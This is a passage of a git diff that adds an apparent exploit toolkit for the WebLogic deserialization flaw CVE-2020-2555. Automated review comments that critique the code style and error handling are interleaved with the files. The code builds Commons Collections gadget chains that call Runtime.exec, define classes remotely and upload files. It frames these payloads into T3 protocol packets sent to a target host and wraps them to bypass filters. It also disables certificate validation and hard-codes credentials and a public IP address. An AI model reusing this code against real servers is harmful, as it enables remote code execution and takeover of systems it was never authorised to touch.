+ field = getField(clazz.getSuperclass(), fieldName);
+ }
+ field.setAccessible(true);
+ return field;
+ }
+
+ public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+ final Field field = getField(obj.getClass(), fieldName);
+ field.set(obj, value);
+ }
+
+ public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+ final Field field = getField(obj.getClass(), fieldName);
+ return field.get(obj);
+ }
+
+ public static Constructor getFirstCtor(final String name) throws Exception {
+ final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
+ ctor.setAccessible(true);
+ return ctor;
+ }
+
+}
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/SerialDataGenerator.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/SerialDataGenerator.java
new file mode 100644
index 0000000000000000000000000000000000000000..8e03f2f1aceb4ef2a49068aff6855d957a93af05
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/SerialDataGenerator.java
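Review bot: The superclass fallback in `getField()` can never run: `clazz.getDeclaredField(fieldName)` throws NoSuchFieldException instead of returning null, so `if (field == null && ...)` is dead code and a field declared on a parent class is reported as missing. Catch the exception and recurse from the handler, as below. `getFirstCtor()` takes element 0 of `getDeclaredConstructors()`, whose order the Javadoc does not guarantee; a comment should say that callers rely on the named class having a single constructor.

```java
public static Field getField(final Class clazz, final String fieldName) throws Exception {
    Field field;
    try {
        field = clazz.getDeclaredField(fieldName);
    } catch (NoSuchFieldException e) {
        if (clazz.getSuperclass() == null) {
            throw e;
        }
        // not declared here: look on the parent class instead
        field = getField(clazz.getSuperclass(), fieldName);
    }
    field.setAccessible(true);
    return field;
}
```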
@@ -0,0 +1,102 @@ +package com.supeream.serial; + +import com.supeream.weblogic.BypassPayloadSelector; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; +import org.mozilla.classfile.DefiningClassLoader; + +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; + +/** + * Created by nike on 17/7/3. + */ +public class SerialDataGenerator { + + private static final String REMOTE = "com.supeream.payload.RemoteImpl"; + private static final String remoteHex = "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"; + + + private static byte[] serialData(Transformer[] transformers) throws Exception { + final Transformer transformerChain = new ChainedTransformer(transformers); + final Map innerMap = new HashMap(); + // 初始化map 设置laymap + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + InvocationHandler handler = (InvocationHandler) Reflections + .getFirstCtor( + "sun.reflect.annotation.AnnotationInvocationHandler") + .newInstance(Override.class, lazyMap); + + final Map mapProxy = Map.class + .cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(), + new Class[]{Map.class}, handler)); + + handler = (InvocationHandler) Reflections.getFirstCtor( + "sun.reflect.annotation.AnnotationInvocationHandler") + .newInstance(Override.class, mapProxy); + + Object _handler = BypassPayloadSelector.selectBypass(handler); + return Serializables.serialize(_handler); + } + + private static Transformer[] defineAndLoadPayloadTransformerChain(String className, byte[] clsData, String[] bootArgs) throws Exception { + Transformer[] transformers = new Transformer[]{ + new 
ConstantTransformer(DefiningClassLoader.class), + new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}), + new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}), + new InvokerTransformer("defineClass", + new Class[]{String.class, byte[].class}, new Object[]{className, clsData}), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{bootArgs}}), + new ConstantTransformer(new HashSet())}; + return transformers; + } + + private static Transformer[] uploadTransformerChain(String className, byte[] clsData, String filePath, byte[] content) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(DefiningClassLoader.class), + new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}), + new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}), + new InvokerTransformer("defineClass", + new Class[]{String.class, byte[].class}, new Object[]{className, clsData}), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"uploadFile", new Class[]{String.class, byte[].class}}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{filePath, content}}), + new ConstantTransformer(new HashSet())}; + return transformers; + } + + private static Transformer[] blindExecutePayloadTransformerChain(String[] execArgs) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[]{ + String.class, Class[].class}, new Object[]{ + "getRuntime", new Class[0]}), + new InvokerTransformer("invoke", new Class[]{ + 
Object.class, Object[].class}, new Object[]{ + null, new Object[0]}), + new InvokerTransformer("exec", + new Class[]{String[].class}, new Object[]{execArgs}), + new ConstantTransformer(new HashSet())}; + return transformers; + } + + public static byte[] serialRmiDatas(String[] bootArgs) throws Exception { + return serialData(defineAndLoadPayloadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), bootArgs)); + } + + public static byte[] serialBlindDatas(String[] execArgs) throws Exception { + return serialData(blindExecutePayloadTransformerChain(execArgs)); + } + + public static byte[] serialUploadDatas(String filePath, byte[] content) throws Exception { + return serialData(uploadTransformerChain(SerialDataGenerator.REMOTE, BytesOperation.hexStringToBytes(SerialDataGenerator.remoteHex), filePath, content)); + } + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Serializables.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Serializables.java new file mode 100644 index 0000000000000000000000000000000000000000..719a6f04f5adbce397a67526a61bf7cdf7a0b8af --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Serializables.java 
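Review bot: `serialData()` and the three `*TransformerChain()` builders carry no explanation beyond the inline comment `// 初始化map 设置laymap`, so a reader has to recognise the `LazyMap` / `AnnotationInvocationHandler` / `InvokerTransformer` construction unaided. Add an English comment on `serialData()` along the lines of `// Wraps the transformer chain in LazyMap + AnnotationInvocationHandler proxies; a deserialization filter rejecting org.apache.commons.collections.functors.* is the usual mitigation`. All three builders declare `throws Exception` although they only construct objects, and the first four entries of `defineAndLoadPayloadTransformerChain()` and `uploadTransformerChain()` are identical and could come from one private helper.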
@@ -0,0 +1,30 @@
+package com.supeream.serial;
+
+import java.io.*;
+
+public class Serializables {
+
+ public static byte[] serialize(final Object obj) throws IOException {
+ final ByteArrayOutputStream out = new ByteArrayOutputStream();
+ serialize(obj, out);
+ return out.toByteArray();
+ }
+
+ public static void serialize(final Object obj, final OutputStream out) throws IOException {
+ final ObjectOutputStream objOut = new ObjectOutputStream(out);
+ objOut.writeObject(obj);
+ objOut.flush();
+ objOut.close();
+ }
+
+ public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+ final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+ return deserialize(in);
+ }
+
+ public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+ final ObjectInputStream objIn = new ObjectInputStream(in);
+ return objIn.readObject();
+ }
+
+}
\ No newline at end of file
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/SocketFactory.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/SocketFactory.java
new file mode 100644
index 0000000000000000000000000000000000000000..6dd51d122fb06917bbfd47b9b083131b33d09cc6
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/SocketFactory.java
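Review bot: `deserialize(InputStream)` hands the stream straight to `ObjectInputStream.readObject()` with no class filter and never closes `objIn`, so any caller that passes bytes it did not produce itself runs whatever object graph they describe. Document that contract on both `deserialize` overloads, or on Java 9+ install a filter first with `objIn.setObjectInputFilter(...)`. In `serialize(Object, OutputStream)` the `objOut.close()` call is skipped when `writeObject` throws; `try (ObjectOutputStream objOut = new ObjectOutputStream(out)) { objOut.writeObject(obj); }` covers that path.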
@@ -0,0 +1,34 @@
+package com.supeream.ssl;
+
+import com.supeream.Main;
+
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSocketFactory;
+import javax.net.ssl.TrustManager;
+import java.net.Socket;
+import java.security.SecureRandom;
+
+/**
+ * Created by nike on 17/6/29.
+ */
+public class SocketFactory {
+ private SocketFactory() {
+ }
+
+ public static Socket newSocket(String host, int port) throws Exception {
+ Socket socket = null;
+ if (Main.cmdLine.hasOption("https")) {
+ SSLContext context = SSLContext.getInstance("SSL");
+ // 初始化
+ context.init(null,
+ new TrustManager[]{new TrustManagerImpl()},
+ new SecureRandom());
+ SSLSocketFactory factory = context.getSocketFactory();
+ socket = factory.createSocket(host, port);
+ } else {
+ socket = new Socket(host, port);
+ }
+
+ return socket;
+ }
+}
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/TrustManagerImpl.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/TrustManagerImpl.java
new file mode 100644
index 0000000000000000000000000000000000000000..803374776c2def59c8970b51fe120b1fec9894cb
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/TrustManagerImpl.java
@@ -0,0 +1,25 @@
+package com.supeream.ssl;
+
+import javax.net.ssl.X509TrustManager;
+import java.security.cert.CertificateException;
+import java.security.cert.X509Certificate;
+
+/**
+ * Created by nike on 17/6/29.
+ */
+public class TrustManagerImpl implements X509TrustManager {
+
+ @Override
+ public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
+ }
+
+ @Override
+ public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
+
+ }
+
+ @Override
+ public X509Certificate[] getAcceptedIssuers() {
+ return null;
+ }
+}
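Review bot: `SSLContext.getInstance("SSL")` in `newSocket` asks for the legacy protocol name, and the context is initialised with `TrustManagerImpl`, which accepts every chain, so the `https` branch encrypts without authenticating the peer; nothing in this method checks the hostname either. If that is deliberate for targets with self-signed certificates, the place where the context is built should say so, and `SSLContext.getInstance("TLS")` is the current spelling. The inline comment `// 初始化` should be English like the rest of the file, e.g. `// initialise the context; the trust manager below performs no certificate validation`.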
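Review bot: `checkServerTrusted` and `checkClientTrusted` have empty bodies, so every certificate chain is accepted and a connection made through `SocketFactory` can be intercepted without the client noticing; `WeblogicTrustManager.certificateCallback` in the next file has the same shape with its unconditional `return true`. `getAcceptedIssuers()` also returns `null`, while the `X509TrustManager` contract asks for a non-null, possibly empty array, so `return new X509Certificate[0];` is the safer body. Neither class name hints at this behaviour; a class-level Javadoc stating that validation is disabled would keep the classes from being copied into code that needs real trust checks.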
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/WeblogicTrustManager.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/WeblogicTrustManager.java
new file mode 100644
index 0000000000000000000000000000000000000000..f1641dc93d9ee77e8732a323bec2988d602f7786
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/ssl/WeblogicTrustManager.java
@@ -0,0 +1,15 @@
+package com.supeream.ssl;
+
+import weblogic.security.SSL.TrustManager;
+
+import java.security.cert.X509Certificate;
+
+/**
+ * Created by nike on 17/6/29.
+ */
+public class WeblogicTrustManager implements TrustManager {
+ @Override
+ public boolean certificateCallback(X509Certificate[] x509Certificates, int i) {
+ return true;
+ }
+}
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/BypassPayloadSelector.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/BypassPayloadSelector.java
new file mode 100644
index 0000000000000000000000000000000000000000..d9839880bdd0441207ccf3b522fda46e433d95fa
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/BypassPayloadSelector.java
@@ -0,0 +1,44 @@
+package com.supeream.weblogic;
+
+import com.supeream.Main;
+import com.supeream.serial.Serializables;
+import weblogic.corba.utils.MarshalledObject;
+import weblogic.jms.common.StreamMessageImpl;
+
+import java.io.IOException;
+
+/**
+ * Created by nike on 17/6/26.
+ */
+public class BypassPayloadSelector {
+
+ private static Object marshalledObject(Object payload) {
+ MarshalledObject marshalledObject = null;
+ try {
+ marshalledObject = new MarshalledObject(payload);
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return marshalledObject;
+ }
+
+
+ public static Object streamMessageImpl(byte[] object) throws Exception {
+
+ StreamMessageImpl streamMessage = new StreamMessageImpl();
+ streamMessage.setDataBuffer(object, object.length);
+ return streamMessage;
+ }
+
+ public static Object selectBypass(Object payload) throws Exception {
+
+ if (Main.TYPE.equalsIgnoreCase("marshall")) {
+ payload = marshalledObject(payload);
+ } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
+ payload = streamMessageImpl(Serializables.serialize(payload));
+ }
+ return payload;
+ }
+
+
+}
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/ObjectTest.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/ObjectTest.java
new file mode 100644
index 0000000000000000000000000000000000000000..2d9e596c7cd6e9c2595b0b16c457e171aabaff67
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/ObjectTest.java
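Review bot: `marshalledObject` catches `IOException`, prints the stack trace and returns `null`, so `selectBypass` hands a null back to its caller with no error signalled. Since `selectBypass` already declares `throws Exception`, the helper can declare `throws IOException` and drop the try/catch. `Main.TYPE.equalsIgnoreCase(...)` also throws a NullPointerException if `Main.TYPE` is unset (its declaration is not visible in this diff); `"marshall".equalsIgnoreCase(Main.TYPE)` is the null-safe form.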
@@ -0,0 +1,27 @@
+package com.supeream.weblogic;
+
+import com.supeream.serial.BytesOperation;
+
+import java.io.*;
+
+/**
+ * Created by nike on 17/7/11.
+ */
+public class ObjectTest {
+ public static void main(String[] args) throws Exception {
+
+
+ ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+ ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
+ objectOutputStream.writeUTF("xxx");
+ String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray());
+ System.out.println(xx);
+ byte[] cons = BytesOperation.hexStringToBytes(xx);
+
+
+
+ ByteArrayInputStream bis = new ByteArrayInputStream(cons);
+ ObjectInputStream objectInputStream = new ObjectInputStream(bis);
+ objectInputStream.readObject();
+ }
+}
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3ProtocolOperation.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3ProtocolOperation.java
new file mode 100644
index 0000000000000000000000000000000000000000..c0302756c99c2bfedfa47ae41bbe57108429d932
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3ProtocolOperation.java
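Review bot: `main` calls `byteArrayOutputStream.toByteArray()` without flushing or closing `objectOutputStream`, so the `writeUTF("xxx")` data is presumably still in the stream's internal buffer and the hex dump shows only the stream header; `objectOutputStream.flush();` before `toByteArray()` fixes that. The later `readObject()` is applied to data written with `writeUTF`, which does not match; `readUTF()` is the counterpart. If this is a scratch file, it probably should not be part of the commit.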
@@ -0,0 +1,130 @@ +package com.supeream.weblogic; + +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by Fernflower decompiler) +// + +import com.supeream.Main; +import com.supeream.serial.BytesOperation; +import com.supeream.serial.Serializables; +import com.supeream.ssl.SocketFactory; +import weblogic.rjvm.JVMID; +import weblogic.security.acl.internal.AuthenticatedUser; + +import java.io.BufferedReader; +import java.io.InputStreamReader; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.net.InetAddress; +import java.net.Socket; + +public class T3ProtocolOperation { + + + public static void send(String host, String port, byte[] payload) throws Exception { + Socket s = SocketFactory.newSocket(host, Integer.parseInt(port)); + //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 鐢ㄦ潵鍋歴kip鐨� + String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n"; + + if (Main.cmdLine.hasOption("https")) { + header = "t3s 7.0.0.0\nAS:10\nHL:19\n\n"; + } + + s.getOutputStream().write(header.getBytes()); + s.getOutputStream().flush(); + BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream())); + String versionInfo = br.readLine(); + if (Main.version == null) { + versionInfo = versionInfo.replace("HELO:", ""); + versionInfo = versionInfo.replace(".false", ""); + System.out.println("weblogic version:" + versionInfo); + Main.version = versionInfo; + } +// String asInfo = br.readLine(); +// String hlInfo = br.readLine(); +// System.out.println(versionInfo+"\n"+asInfo+"\n"+hlInfo); + + //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1 + + //t3 protocol + String cmd = "08"; + String qos = "65"; + String flags = "01"; + String responseId = "ffffffff"; + String invokableId = "ffffffff"; + String abbrevOffset = "00000000"; + String countLength = "01"; + String capacityLength = "10";//蹇呴』澶т簬涓婇潰璁剧疆鐨凙S鍊� + String readObjectType = "00";//00 object deserial 01 ascii + + StringBuilder 
datas = new StringBuilder(); + datas.append(cmd); + datas.append(qos); + datas.append(flags); + datas.append(responseId); + datas.append(invokableId); + datas.append(abbrevOffset); + + //because of 2 times deserial + countLength = "04"; + datas.append(countLength); + + //define execute operation + String pahse1Str = BytesOperation.bytesToHexString(payload); + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(pahse1Str); + + //for compatiable fo hide + //for compatiable fo hide + AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123"); + String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser)); + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(phase4); + + JVMID src = new JVMID(); + + Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); + constructor.setAccessible(true); + src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); + Field serverName = src.getClass().getDeclaredField("differentiator"); + serverName.setAccessible(true); + serverName.set(src,1); + + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(BytesOperation.bytesToHexString(Serializables.serialize(src))); + + JVMID dst = new JVMID(); + + constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); + constructor.setAccessible(true); + src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); + serverName = src.getClass().getDeclaredField("differentiator"); + serverName.setAccessible(true); + serverName.set(dst,1); + datas.append(capacityLength); + datas.append(readObjectType); + datas.append(BytesOperation.bytesToHexString(Serializables.serialize(dst))); + + byte[] headers = BytesOperation.hexStringToBytes(datas.toString()); + int len = headers.length + 4; + String hexLen = Integer.toHexString(len); + StringBuilder dataLen = new 
StringBuilder(); + + if (hexLen.length() < 8) { + for (int i = 0; i < (8 - hexLen.length()); i++) { + dataLen.append("0"); + } + } + + dataLen.append(hexLen); + s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + datas.toString())); + s.getOutputStream().flush(); + s.close(); + + } + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3Test.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3Test.java new file mode 100644 index 0000000000000000000000000000000000000000..d8efa1bc54d9da735631565b745fee8113361b34 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/T3Test.java 
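Review bot: Two comments in `send` are mojibake (the one after `//AS ABBREV_TABLE_SIZE HL remoteHeaderLength` and the one on `capacityLength`), which looks like UTF-8 Chinese decoded with the wrong charset; the same garbled text recurs in `T3Test.java`. They should be restored and written in English, e.g. `// AS = abbrev table size, HL = remote header length` and, if the garbled text decodes the way it appears to, `// must be greater than the AS value set above`. `new AuthenticatedUser("weblogic", "admin123")` is a hard-coded credential pair that secret scanners will flag on every clone; a named constant with a comment explaining its purpose makes that triage quicker. `s` is closed only on the success path and `br.readLine()` may return null when the peer closes early, so `try (Socket s = ...)` plus a null check on `versionInfo` would cover both.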
@@ -0,0 +1,224 @@ +package com.supeream.weblogic; + +import com.supeream.Main; +import com.supeream.payload.RemoteImpl; +import com.supeream.serial.BytesOperation; +import com.supeream.serial.SerialDataGenerator; +import com.supeream.serial.Serializables; +import com.supeream.ssl.SocketFactory; +import org.apache.commons.cli.CommandLineParser; +import org.apache.commons.cli.DefaultParser; +import org.apache.commons.cli.Options; +import weblogic.apache.org.apache.velocity.runtime.Runtime; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.jndi.internal.NamingNode; +import weblogic.protocol.Identity; +import weblogic.rjvm.JVMID; +import weblogic.rmi.cluster.ClusterableRemoteObject; +import weblogic.rmi.cluster.ReplicaAwareRemoteObject; +import weblogic.security.acl.internal.AuthenticatedUser; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.NamingEnumeration; +import java.io.*; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.net.Inet4Address; +import java.net.InetAddress; +import java.net.Socket; +import java.rmi.Remote; + +/** + * Created by nike on 17/6/28. 
+ */ +public class T3Test { + + public static void main(String[] args) throws Exception { + + +// Options options = new Options(); +// options.addOption("https",false,"xx"); +// CommandLineParser parser = new DefaultParser(); +// Main.cmdLine = parser.parse(options, args); +// +// Socket s = SocketFactory.newSocket("77.246.34.226", 443); +// //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 鐢ㄦ潵鍋歴kip鐨� +// String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n"; +// s.getOutputStream().write(header.getBytes()); +// s.getOutputStream().flush(); +// BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream())); +// String versionInfo = br.readLine(); +// String asInfo = br.readLine(); +// String hlInfo = br.readLine(); +// +// System.out.println(versionInfo + "\n" + asInfo + "\n" + hlInfo); + +// +// //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1 +// +// +// //t3 protocol +// String cmd = "09"; +// String qos = "65"; +// String flags = "01"; +// String responseId = "ffffffff"; +// String invokableId = "ffffffff"; +// String abbrevOffset = "00000022";//16+3=19+4+4+1=28+1+1+5348=5378-4=000014fe 30+8-4 +// +// +// String countLength = "02"; +// String capacityLength = "10";//蹇呴』澶т簬涓婇潰璁剧疆鐨凙S鍊� +// String readObjectType = "00";//00 object deserial 01 ascii +// +// StringBuilder dataS = new StringBuilder(); +// dataS.append(cmd); +// dataS.append(qos); +// dataS.append(flags); +// dataS.append(responseId); +// dataS.append(invokableId); +// dataS.append(abbrevOffset); +// +// //RemotePeriodLength +// dataS.append("00000001"); +// //PublickeySize +// dataS.append("00000001"); +// System.out.println(Integer.toHexString(115)); +// dataS.append("0001"); +// +// byte[] phase1 = Serializables.serialize(new File("/etc/passwd")); +// System.out.println("payloadlength="+(phase1.length)); +// String pahse1Str = BytesOperation.bytesToHexString(phase1); +// System.out.println("pahse1Str="+pahse1Str); +// 
dataS.append(pahse1Str.substring(8)); +// +// countLength = "04"; +// dataS.append(countLength); +// +// +// //define IRemote.class class by byte[] +//// byte[] phase1 = SerialDataGenerator.serialRmiDatas(new String[]{"install"}); +//// String pahse1Str = BytesOperation.bytesToHexString(phase1); +//// datas.append(capacityLength); +//// datas.append(readObjectType); +//// datas.append(pahse1Str); +// +// +// +// //for compatiable fo hide +// Class x = Class.forName("weblogic.rjvm.ClassTableEntry"); +// +// Class xxf = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); +// ObjectStreamClass objectStreamClass = ObjectStreamClass.lookup(xxf); +// Constructor f = x.getDeclaredConstructor(ObjectStreamClass.class, String.class); +// +// f.setAccessible(true); +// Object xx = f.newInstance(objectStreamClass,""); +// +// String phase41 = BytesOperation.bytesToHexString(Serializables.serialize(xx)); +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(phase41); +// +// +// //for compatiable fo hide +// AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123"); +// String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser)); +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(phase4); +// +// JVMID dst = new JVMID(); +// +// Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); +// constructor.setAccessible(true); +// dst = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); +// Field serverName = dst.getClass().getDeclaredField("differentiator"); +// serverName.setAccessible(true); +// serverName.set(dst,0); +// +// serverName = dst.getClass().getDeclaredField("transientIdentity"); +// serverName.setAccessible(true); +// serverName.set(dst,new Identity(1000l)); +// +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// 
dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(dst))); +// +// JVMID src = new JVMID(); +// +// constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class); +// constructor.setAccessible(true); +// src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false); +// serverName = src.getClass().getDeclaredField("differentiator"); +// serverName.setAccessible(true); +// serverName.set(dst,0); +// +// serverName = src.getClass().getDeclaredField("transientIdentity"); +// serverName.setAccessible(true); +// serverName.set(src,new Identity(1000l)); +// +// dataS.append(capacityLength); +// dataS.append(readObjectType); +// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(src))); +// +// +// +//// RemotePeriodLength +// int remotePeriodLength = Integer.MAX_VALUE; +// ByteArrayOutputStream bos = new ByteArrayOutputStream(); +// DataOutputStream dos = new DataOutputStream(bos); +// dos.writeInt(remotePeriodLength); +// dos.flush(); +// dos.close(); +// System.out.println(BytesOperation.bytesToHexString(bos.toByteArray())); +// +// System.out.println(dataS.toString()); +// +// byte[] headers = BytesOperation.hexStringToBytes(dataS.toString()); +// +// +// int len = headers.length + 4; +// String hexLen = Integer.toHexString(len); +// +// StringBuilder dataLen = new StringBuilder(); +// if (hexLen.length() < 8) { +// for (int i = 0; i < (8 - hexLen.length()); i++) { +// dataLen.append("0"); +// } +// } +// +// dataLen.append(hexLen); +// System.out.println("length="+dataLen); +// +// s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + dataS.toString())); +// s.getOutputStream().flush(); +// +// System.out.println("result="+br.readLine()); +// s.close(); + + System.setProperty("weblogic.rjvm.enableprotocolswitch","true"); + System.setProperty("UseSunHttpHandler","true"); + System.setProperty("ssl.SocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl"); + 
System.setProperty("ssl.ServerSocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl"); + + + + Context initialContext = Main.getInitialContext("t3s://" + "127.0.0.1" + ":" + 7001); +// Context initialContext = Main.getInitialContext("t3://" + "10.211.55.5" + ":" + 7001); + +// NamingNode remote = (NamingNode) initialContext.lookup("weblogic"); +// System.out.println(remote.toString()); + +// System.out.println(initialContext.); + System.out.println(initialContext.getEnvironment()); + NamingEnumeration namingEnumeration = initialContext.list(""); + while (namingEnumeration.hasMoreElements()) { + System.out.println(namingEnumeration.next().getClass().getName()); + + } + +// weblogic.jndi.internal.WLContextImpl serverNamingNode = (weblogic.jndi.internal.WLContextImpl) initialContext.lookup("weblogic"); + + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/WebLogicOperation.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/WebLogicOperation.java new file mode 100644 index 0000000000000000000000000000000000000000..215abd47e03b100d3a51d02442ae33b9e4dfcb01 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/weblogic/WebLogicOperation.java 
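Review bot: Most of `main` is a commented-out copy of the framing code in `T3ProtocolOperation.send`, and it embeds a hard-coded public IPv4 address in the `SocketFactory.newSocket(...)` call; dead code that records a routable host should be deleted before commit rather than archived. The live part only lists a JNDI context on `127.0.0.1`, so nearly all of the imports (`RemoteImpl`, `SerialDataGenerator`, the commons-cli classes, `JVMID`, `AuthenticatedUser`, and others) are unused and can go with it. `initialContext` is never closed; an `initialContext.close()` in a `finally` block releases the connection.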
@@ -0,0 +1,47 @@
+package com.supeream.weblogic;
+
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by Fernflower decompiler)
+//
+
+import com.supeream.Main;
+import com.supeream.serial.SerialDataGenerator;
+import com.supeream.serial.Serializables;
+
+public class WebLogicOperation {
+
+ public static void installRmi(String host, String port) throws Exception {
+ byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
+ T3ProtocolOperation.send(host, port, payload);
+ }
+
+ public static void unInstallRmi(String host, String port) throws Exception {
+ byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"});
+ T3ProtocolOperation.send(host, port, payload);
+ }
+
+ public static void blind(String host, String port) throws Exception {
+ byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")});
+ T3ProtocolOperation.send(host, port, payload);
+ }
+
+ public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception {
